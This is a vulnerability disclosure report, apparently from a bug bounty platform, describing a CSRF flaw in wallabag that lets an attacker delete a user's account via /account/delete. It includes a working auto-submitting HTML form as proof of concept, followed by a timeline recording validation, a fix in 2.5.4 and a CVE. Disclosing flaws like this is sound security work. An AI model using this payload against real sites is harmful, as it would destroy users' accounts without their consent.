CSRF leading to delete account in wallabag/wallabag

Valid

Reported on

Jan 4th 2023

Description

wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via /account/delete.

Proof of Concept

Create a new user.
Login as the new user.
Open the following HTML file in the browser.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/account/delete">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking a user to delete their own account.

We are processing your report and will contact the wallabag team within 24 hours. 3 months ago

We have contacted a member of the wallabag team and are waiting to hear back 3 months ago

Jérémy Benoist validated this vulnerability a month ago

bAu has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Jérémy Benoist marked this as fixed in 2.5.4 with commit 268372 a month ago

Jérémy Benoist has been awarded the fix bounty

This vulnerability has been assigned a CVE

Jérémy Benoist published this vulnerability a month ago

A wallabag/wallabag maintainer gave praise a month ago

Thank you!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

to join this conversation